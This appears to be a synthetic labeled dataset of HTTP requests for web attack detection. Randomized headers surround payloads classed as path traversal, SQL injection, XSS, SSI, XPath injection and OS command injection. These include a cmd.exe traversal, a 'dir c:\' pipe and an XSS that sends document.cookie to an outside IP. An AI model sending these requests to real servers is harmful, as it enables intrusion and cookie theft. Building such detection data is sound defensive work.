If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: "4sH3SVp89wro2aXcG"
If-None-Match: "Sc5xe.Jq4lHUqUmZ"
If-Range: Tue, 17 Jun 08 07:37:13 GMT
Max-Forwards: 3053
MIME-Version: 5.1
Pragma: ulerr='xdFetH'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Basic YWVuaXVyOnRpZW91cnI=
Range: 2208-72
Referer: /yril8n/e0dtlof/nlCykjs/livrkcy/nSCReE.pdf
TE: gzip;q=0.8,deflate,trailers
Trailer: Trailer
User-Agent: ifczxh/9.5.1.0
UA-CPU: 68000
UA-Disp: 322,5998,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 357x4433
Via: 4.2 128.248.245.33, 0lF/6.8 www.orea9.html:86863
Transfer-Encoding: wuin
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39781
Start - Id: 45860
class: PathTransversal
GET /pCsr9RaCmf/jSOcmVTq/2chl/Bnph-wWt/2eahez/n8brtif7it6Es8hy/a0vI6E-/lenOotiue8Ti/sO7icbotgno8Atrc/Sio6Ytip4cie/4LdeleteF@1R.jpg?uhstrt=Pt6nepsf1%5Dttalls+a%3B&wjZFpy_nprocessing-instruction4OB=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Lbtths7teoairg=inp%7Cg%3F&ipoh=lVwuZFuoG2L&xftohh1hm1ymw5o=97&96d8boot.init=9154850533 HTTP/1.1
Host: 22.37.195.156:80
Connection: keep-alive
Accept: text/xml;q=0.3, application/*;q=0.8, image/gif
Accept-Charset: x-mac-turkish;q=0.5, x-mac-hebrew, x-mac-turkish;q=0.9, windows-1254;q=0.4
Accept-Encoding: compress, identity
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 136.24.127.56
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Tue, 28 Oct 08 08:42:32 CET
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: dw8u4c
From: teqnen@eMOfb.uk
If-Modified-Since: Thu, 10 Apr 08 17:23:35 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: "GnjmK@oY9m.j_ZIk"
If-None-Match: *
If-Range: Mon, 09 Jan 06 22:46:10 UTC
Max-Forwards: 3415
MIME-Version: 2.1
Pragma: 02Twseeu='b7e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://www.ztqoTufi.com/thOe/Hber4d/9eTh/pt1NelJd/0tlt.php
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: u2pRAwbkp http://www.4lfRt5ro.it
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0549x672
Via: 3.3 63.142.53.49, 8.7 www.eeai.jpg
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45860
Start - Id: 42651
class: SqlInjection
GET /ToRoed8wtWsdejmgDdse/eYqk.F64iQ.5bGrZerk/ojci5k5oUWITC/ersdOt/s.b9G1rwGr_b/wlEdon7onhrzt0rtdrue.jpg?M@AR@S=%27++%2F**%2F++OR+++%2F**%2F%27%27+++%3D++%27&wvQtEd=tNOaTsxgem.&uWpfzGGfD=872&aonwIetnIosWu=50xt6&ne2A=yeoi7Uhi4It9wraz&elpsLm=07554648&nitqerercrejnd=975&peum2=e1hrE0rtonienPuf&3runrsyB5=a5X3U3.t4a&cTeNmC=%3Cl9&isdseoefde7eHte=tAweAlaifvfyTa&uuonheau=6S4qnw&eiiS=ilseb HTTP/1.1
Host: www.xHsegc.gov
Connection: usvl
Accept: audio/*;q=0.7, application/*;q=0.0, video/quicktime;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: i-xY;q=0.7
Cache-Control: no-store
Client-ip: 183.138.44.237
Cookie: ceeo4=803
Cookie2: $Version="2"
Date: Wed, 02 Jan 08 08:38:13 UTC
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Mon, 30 Nov 09 18:31:36 GMT
If-Unmodified-Since: Sun, 14 Aug 05 21:30:20 GMT
If-Match: *
If-None-Match: *
If-Range: "IEn8juBMUOS2xQRK"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest realm
Range: -5
Referer: /maneU/dhorhee/rtzKwwnb/th5oier.htm
TE: trailers
Trailer: Accept-Charset
User-Agent: tmesaett/5.8.2.4.2
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: compress
Upgrade: tehfc/4.6, Ehs/2.9, ereo/5.2
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 81024686129
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42651
Start - Id: 47947
class: XSS
GET /vLbLkAPj/ei0iv/ZKM8/ZIo3tdexz/rqhh6SnDynesis/vM.g2/i2YXu9nE2R21cNTO0ulQ.cfm?0XeNckcz=%3Cscript%3Ealert+%28%27eeauieSod.ils8n%27%29%3C%2Fscript++++%3E HTTP/1.1
Host: 238.3.181.252
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-4;q=0.6, euc-jp;q=0.9, hz-gb-2312;q=0.4, us-ascii;q=0.4, iso-2022-kr
Accept-Encoding: 
Accept-Language: 6igpo18m-ai, bci-t3ya, 4hrsdi-nRnff;q=0.6, tnie-Soc, De-r;q=0.4
Cache-Control: no-store
Client-ip: 55.58.52.249
Cookie: zun=o$ 
Cookie2: $Version="771"
Date: Thu, 30 Aug 07 03:38:19 CET
ETag: "lT7Ksneo3lP4TiG"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Sun, 18 Feb 07 05:49:19 GMT
If-Unmodified-Since: Fri, 20 Feb 09 06:47:35 GMT
If-Match: "b5yj9YO-qHQHzz.Edad"
If-None-Match: "1J-mqZ5_IBssu9kXYA"
If-Range: *
Max-Forwards: 28
MIME-Version: 2.0
Pragma: Rors=adntg
Proxy-Authorization: mbntn edar=HBooepu
Authorization: Digest qop=auth
Range: -162,92-
Referer: /iot3rqc/utlsi7/KtrsnC.nsf
TE: deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 5.3; e3-no; rv:4.3.4) Gecko/41393541
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5386x6954
Via: FTP/7.1 111.194.175.184
Transfer-Encoding: identity
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47947
Start - Id: 47040
class: XSS
GET /assYdarird7t3/jaQOtTNZ/G4/arp2ZN4sMaUNZJ84/vaekonqseRl4o.png?eotia6ju5T=%3Cdiv+++style+++%3D++++%22++++background-image%3A+url%28javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F245.152.187.112%2Frisech.dll%27%2Bdocument.cookie%29%3B%5D%29%3B++++%22++%3E&group byPkec5YiHE=r%40eiaOwinnt%3Fl3ytn2&ylazd=orcnaeoxonna8hom&lsaYthrtuToa=m1wAoee9i56re1nex&lleg=n1qe9vkkisod HTTP/1.1
Host: www.Nneq.gov
Connection: close
Accept: audio/x-wav;q=0.3, video/*;q=0.7
Accept-Charset: cp-936;q=0.0, utf-8
Accept-Encoding: gzip, gzip
Accept-Language: Sciaudn-l5, 3sda7r-ctqolttn;q=0.2, bt-u4dwwatr
Cache-Control: no-cache
Client-ip: 71.223.100.67
Cookie: F3=?H\6nZ r2\ 
Cookie2: $Version="52"
Date: Fri, 09 Jan 09 11:31:56 UTC
ETag: W/"JuHxQWjnWQYZ_sTjN"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Fri, 16 Apr 04 17:49:42 UTC
If-Unmodified-Since: Fri, 16 Jul 04 09:53:42 UTC
If-Match: *
If-None-Match: *
If-Range: "d8zBZtD9r-Kt1cAB4fN"
Max-Forwards: 0721
MIME-Version: 0.7
Pragma: jq3=iawdetam
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest algorithm=MD5
Range: -00740,898979-,21-
Referer: http://www.Inoahe6.it/rNbLlln/srchj/6uAyaa.pl
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 5.4; n9-rn; rv:3.3.4) Gecko/08600201
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: HTTP/7.5 53.255.9.133, 2.7 195.61.187.212
Transfer-Encoding: n6ea
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47040
Start - Id: 35008
class: SSI
GET /nWam.js?sE3s54cmVfam=%40ri&ddt7b=iu&dmmb8eam=styleumqsvedperl&yAawtetmw=0UsgU&nlugoe=aW%40wJ.&7anrad=3&eh=6BuwPb&ooe1aqiy5rph=n&irehhnpdstt=eut&6eMUAform=Aipevtooknysenow&c4=260608&gctU=sa%25isobject%254o4chs HTTP/1.0
Host: www.nshuj.st
Connection: A7terch
Accept: video/*;q=0.7
Accept-Language: s1rb-wle, mdia-l
Cookie: oaefD=nUf2Ot;itrbi=<!--#odbc connect="uvb,nc,8unkT"       statement="select   *   from   isee"-->;uadanc2snall=oFn@x_c5v4I;mpnbihar=sm]nph-au7moCsHin;thasnMect=gnoo ;nttaetey3uo=11
If-Modified-Since: Mon, 22 Jun 09 11:51:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 21
Referer: http://tltrer.fr/eieet1/otab.php3
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 8.5; So-hr; rv:8.1.0) Gecko/44892826
Via: 2.7 www.kuoor.gif
Warning: 988 www.p5aTas.gif "Gfcls" "Sat, 04 Feb 06 10:31:49 GMT"

null

End - Id: 35008
Start - Id: 49622
class: XPathInjection
GET /bgsoundW_evalYservicesC78/nS5EmhQCxaqtr6Jk0/hOIM483SdsTgKIn/0p1esx/TXDBUbX6.gif?pcnoamrnuan=io%27+++or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++i++++%2Bj%2B+++k++%2Bl++++%2B+++1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+%271nd%27+%3D++++%27+ficH%27+++or&fekrp=+p&iYahone=416716&home-Wscriptv=%5Bw&aaeebaien=qt+npluntea&iwe=hwhereedi&zuenatwma=818047&oxbja7p5uju=aaKEGx5w1GS HTTP/1.1
Host: 44.55.198.197
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.1, identity, deflate
Accept-Language: nde2er-nnroLdo7, e8gili9-Z;q=0.1, 6a-v9rtl, nX-d
Cache-Control: tnor=ahld6
Client-ip: 160.104.242.188
Cookie: nfaivEz1taus=p6ZSnPUJ-cUl;CobjectrkAposition2HdRLnull=8;eLra5dbynvm=veea$0tc'srtn\ovh?Ii;xieamnsadukxtn=gREtdSreplaceoreooegEt'oi;9eadzei=gfa
Cookie2: $Version="860"
Date: Wed, 23 Jul 08 07:42:08 UTC
ETag: W/"AIyB@oMjPz7sVpcv"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sun, 05 Mar 06 01:43:49 CET
If-Unmodified-Since: Sun, 17 May 09 12:26:52 UTC
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: Tue, 23 Mar 04 05:56:54 GMT
Max-Forwards: 7
MIME-Version: 6.1
Pragma: tstnolIf=1qmnm
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: oeqred isp0=0etp
Range: 05-349
Referer: http://www.wovwr.ch/edolNet9/tpiZil/7aopri/nohyw.sh
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 3.0; lt-tc; rv:3.4.9) Gecko/48672112
UA-CPU: StrongARM
UA-Disp: 198,0683,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: HTTP/5.3 www.rHoscTsi.htm
Transfer-Encoding: gzip
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49622
Start - Id: 40606
class: SSI
GET /ces9shng7mnnxetTtc/in7m7z-AHnetcatZ/ej4mtBb/ogcnUdasl4tnn/mnbBh/mrisoiaooh5h/Yacifotr/Gbetweenae/tpDXAr4qGQShoyfasq/nKkRunUh/irnveNsietanh.cgi?LpQV=%3C%21--+++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&nheresnl=rltetbeMsm&oXimga=ae&ard8bae2=yAle&sevtrsRa=e9&iYjH5iamturT=eXV&feemtth=741418142&3BPkpXCY=1ainletr9sR&rnace7nyeetr=53&tcdae=2212392&yaoimantlosdv=xDNrnsEark&fqtmscriptZuZGphp=tto9&enhbre=esexeca&iwtbep=9BDP HTTP/1.0
Host: 32.154.95.71:176
Connection: keep-alive
Accept: video/*, text/html;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 146.4.65.176
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Sat, 17 Jan 04 14:57:31 CET
ETag: W/"hRpE5sdLGOIMRDDGsThB"
Expect: 100-continue
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Sun, 22 Jun 08 15:10:16 CET
If-Match: "ip44e8D6PF3ao_lI"
If-None-Match: "gzgBriVDGPuJFNsWj"
If-Range: Fri, 23 Oct 09 08:23:07 CET
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: sLpp optl2ev6=eorea
Range: -7,-7178,-26215
Referer: /ncrnE.msf
TE: deflate;q=0.2
Trailer: Expect
User-Agent: tzeisds
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 1.9 79.187.123.114:3936
Transfer-Encoding: gzip
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 431541377
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40606
Start - Id: 47444
class: XSS
GET /h3hTxg6X3z9xwRMei/i06j22HAA8S_Akn0f-/2meaLaguo/ty3na/1imsDySh/3ch1aG2zSotbLYeh.png?destihot8U=2Db5arstix&kiosavflpwue=nmsaiu%2Bsd&eeg2twHn=%3Cscript+++%3Ealert+%28allxKek.inoR2%29%3C%2Fscript%3E&bIhTWf_.processing-instructionY5=edrgiea2vbscriptipnay&nklaEoeeliNtNnh=n%3FNn%3Dosr&OFd_mNiDHeD6=iHn&87syx0LnG=tDie91fwQ&ldrr8Oe4jhib6cb=aooWaVP&QtuosRooileaA=auma8uG&Xrefi5is=%5Bnqer+c%25uEb+mqb&2e3tlAacd=8waeoscN&wpFxxecxh8ozf=441 HTTP/1.0
Host: www.dta3ozSog.be
Connection: 0taSriw
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.5, cp-936;q=0.4, iso-8859-6;q=0.8, windows-1254, iso-2022-jp;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: ci0n-evt
Cache-Control: no-transform
Client-ip: 33.233.160.141
Cookie: iesuil8hr=autoexecnode;owadaiibLmc1xb=rrjIG@;in=ejnwbgtnddsDmtdj;group by7o6hIoGlsX=ga5enetkowe2;negoihfuS=86772
Cookie2: $Version="05"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: "xMu08ozzBwiL@pSdUkT"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 08 May 05 10:12:04 UTC
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "mpKmDbfgvw6V4BN6t1"
If-None-Match: "-K3tYlddQN9Sdhz7L"
If-Range: *
Max-Forwards: 7
MIME-Version: 2.5
Pragma: ss4ti0u=eplapAi3
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWlzdHJCYjJ0c2Nvc2NlYWpzcnJlYWxlNzlpc3JtOGhlc3Rvb3Jnd25z
Range: 13744-31405
Referer: /escsfmen.html
TE: deflate;q=0.2,deflate
Trailer: If-Range
User-Agent: Mozilla/2.5 (compatible; MSIE 8.1; Open BSD i586; at3d6)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 644x740
Via: 0.1 www.nstlee.shtml
Transfer-Encoding: compress
Upgrade: tah/4.0, bipq/1.5, o5rz/9.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47444
Start - Id: 44677
class: PathTransversal
GET /e1tlsk9jt0c/ieeelztngmlr/o0J2vDf_f/oPgO4.jpg? HTTP/1.0
Host: www.eW5tdocIE.net
Connection: keep-alive
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cookie: ato=frsturfn3fsexect;sa=./../../../../../;dpewt0eeenk=tnlmisoEeo;arru3=l ;nE4aae8hdait5=3921658557;RzLWBdguT=opte latarjo?b
Cookie2: $Version="49"
Date: Mon, 25 Dec 06 01:43:39 CET
If-Modified-Since: Sun, 26 Oct 08 02:48:35 GMT
If-Unmodified-Since: Sat, 20 Feb 10 24:08:06 UTC
If-None-Match: *
If-Range: *
Pragma: no-cache
Proxy-Authorization: Basic YXJlYXJpOmxzaHdi
Referer: /sjisdh/aeifc.htm
Trailer: Max-Forwards
User-Agent: teetbfpe (lgwGaw0Q; aIIBGo; nuNG0h; eIZ1puq2CW; eio1.WF)

null

End - Id: 44677
Start - Id: 36650
class: OsCommanding
GET /ob7aKR/ObWYwscriptKb/dwuRY1xPp.nRV2.jpeg?hk7gzEhwcIns=varua%3Arnlis3eaT9a%3Bao&oiiehadde=31952&Ppdcty=167.169.168.172++++%7C++dir%2Bc%3A%5C&ltOdnyzhVer8b=209540&djixapdow=titeil%2Bc HTTP/1.1
Host: www.eucpbe.gov:80
Connection: sqebPgns
Accept: */*
Accept-Charset: iso-8859-7, iso-8859-8-i, windows-1255;q=0.9
Accept-Encoding: identity;q=0.6, deflate
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 83.248.187.250
Cookie: WdidItwpiE8=dtnkhseheE;mymeh8irqr=E2htceboot.ini2bNaeanph-h|
Date: Sun, 16 Oct 05 06:12:41 GMT
From: zeiTo@a5ng.biz
If-Modified-Since: Sun, 25 Dec 05 01:41:44 UTC
If-None-Match: "F2-tz_em74WE7TddjB6"
Max-Forwards: 6308
MIME-Version: 8.5
Authorization: NTLM MHQxcnQ4YWJoZXNyYW5xYW5ybng3dGU5bDhoaWU1UmVvZHN2ZA==
Referer: http://www.onpQthet.gov/1lk0RnTp/aho4ihs/4die7.png
TE: chunked;q=0.4,gzip
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (compatible; e2klTEaahl; Linux i386; p4sl; t0OerErn)
UA-CPU: Sparc
UA-OS: Win9x
Via: vedhEm/1.6 2.226.204.122, nasTye/0.7 189.32.35.80
Transfer-Encoding: compress
X-Forwarded-For: 31.147.201.7
----: -----------------

null

End - Id: 36650
Start - Id: 47054
class: XSS
GET /Rdoeeh/ts9yt5nn/mm31UWL3VEAs/c0KLY0S.bhVgL3lNZ1/_rcplJ-GD.y@Cn/bauits.mdb?uPiaiaahn=%3Cdiv++++style+%3D++%22++++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.terostil.com%2Fscript%2Ftah.bin%5D%29%3B+%22+++%3E HTTP/1.1
Host: 164.38.162.242:80
Connection: neraatat
Accept: image/*;q=0.1, audio/basic
Accept-Charset: iso-8859-2;q=0.1, cp-936;q=0.5, gb2312;q=0.5, windows-1257
Accept-Encoding: *;q=0.5
Accept-Language: 8a-we, o93tli-40p
Cache-Control: only-if-cached
Client-ip: 66.107.218.203
Cookie: inaghui=T3hm
Cookie2: $Version="8"
Date: Wed, 04 Oct 06 05:35:03 UTC
ETag: "v3TftZeHd8EU2vMvbiP"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Wed, 21 Jan 04 24:50:29 UTC
If-Unmodified-Since: Wed, 05 Nov 08 13:22:42 CET
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: "HlvHJeL3e74XTBHap"
If-Range: *
Max-Forwards: 28
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest nc=39Ce4CfC
Range: 388869-790680,430-,-04157
Referer: /kanrirn/b8stncta/fi0tqtib/mRpt.aspx
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: hdt5bt/1.8.0.2
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 4.1 www.eusEj.gif, FTP/9.9 www.greMyen.js
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47054
Start - Id: 39325
class: SSI
GET /ecea73edg5Iedisucfo/eeemh6Meobii9nmt8c/soLudrn/o2TTWNgnVe/tgxefieztil/eqbge5eoiknilpjhaeod/IiiW/irta/m.Uq6@Bq/hMe4e5Fs9dBqlCz/yosprsihzAolSi5ct.html?sa=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 35.2.239.26
Connection: ltdsUc
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.7, gzip;q=0.7
Accept-Language: *
Cache-Control: min-fresh=32892
Client-ip: 34.202.111.157
Cookie: OAIwmc=s;rrdtuldo=zdifr
Cookie2: $Version="764"
Date: Wed, 04 Jun 08 21:20:36 GMT
ETag: "NkGZJgLmq2ooIWKkf"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Thu, 09 Oct 08 12:36:37 CET
If-Unmodified-Since: Fri, 10 Apr 09 23:55:52 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jul 04 07:57:42 CET
Max-Forwards: 4871
MIME-Version: 5.7
Pragma: xa=eti7n8
Proxy-Authorization: Digest opaque="nbcimQad"
Authorization: Digest nonce
Range: -7892
Referer: http://www.lerpgs9I.net/borta/s9eig/OfYeeA/mai3styg.dll
TE: trailers
Trailer: Transfer-Encoding
User-Agent: eraposnh (c.8@PXhr; h5-i@_.; kcednvOc)
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 252.189.82.224
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39325
Start - Id: 39275
class: SSI
GET /ieGd/zY/zC/ivbKQeoR0@UycXvjReBp/dR-9hXNSdvxxH_/omghU/eQtiE_oNuA5Y@CsNuoU2/yusrap/trdf8sVits/ch.CPIpAUZShtLSH3/e2fK6eKczIH.A3MKl.b6.css?mfsneb=ki+lo%5D%40all&ookhtS9uctg=2875419&Uogto=t3cmggAr5vrs4v6t2s&httpsEzni-rx=%3C%21--%23email+fromhost%3D%22www.ncaTatrs.com%22+tohost%3D%22mailbox.uat.com%22+message%3D%22Setlvw+dh7buee+O7eshNtS+2sseen%22+fromaddress%3D%22ghytn.com%22+toaddress%3D%22ton.ituAI.com%22+subject%3D%22lsh%22+sender%3D%22shp.com%22+replyto%3D%22giTn0.com%22+cc%3D%22n9ot%22+inreplyto%3D%22ptM+ius+TDbin%22+id%3D%22hemail%22+--%3E&ai5lhhiIvsuPh=UudiHtit&K91FlibY75=vr8loghiexanvon&gen2se2ttf=reb&qer5enes3s=2078&Wtelnet4yMEklSbOL=3422&eelywtisgtenka=ngHO0&03fG=9srrB- HTTP/1.0
Host: www.pyX3eomrem.it
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.9, euc-jp
Accept-Encoding: identity;q=0.0, compress, compress;q=0.6, gzip;q=0.8, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 115.199.196.198
Cookie: ol=8e
Cookie2: $Version="26"
Date: Mon, 13 Feb 06 07:23:36 GMT
ETag: W/"7PpJzZ6D.Le.Qph7"
Expect: tGnf1g=pja2z2le;grncwlo=gs7s
From: oshte@8ntoethSro.uk
If-Modified-Since: Fri, 13 Oct 06 04:27:05 UTC
If-Unmodified-Since: Sun, 18 Dec 05 03:53:40 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Oct 06 11:06:04 CET
Max-Forwards: 0769
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic ZWJzb2N0bzpsRTBjeUJobg==
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: http://www.1gwtm.de/chnmny9p/Hiet4/iyit0bot.htm
TE: chunked
Trailer: Warning
User-Agent: rvoAq/7.8.3
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/4.4 www.7stn.png:0, pbpm/4.8 www.ccahse.css
Transfer-Encoding: compress
Upgrade: dde/7.5
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 34.130.240.220
X-Serial-Number: 04901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39275
Start - Id: 43699
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 221.128.175.73
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.6, windows-1254, windows-1254, x-mac-chinesesimp;q=0.1
Accept-Encoding: identity;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 152.233.157.213
Cookie: lilkfsdo=39;imIRdvsarOugeee=pa@h;iwrtko=WiRjachdPhn2nN;sreredxplatl=5;yrabehcnheteraj=2924228;o2simlscdeawet= cxNt@allodietcztwedt
Cookie2: $Version="119"
Date: Thu, 23 Apr 09 09:26:01 GMT
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 7lboei
From: efdn@eboax.net
If-Modified-Since: Fri, 20 May 05 14:32:36 GMT
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: "bFwQdS-11pwkApQNW"
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 82
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
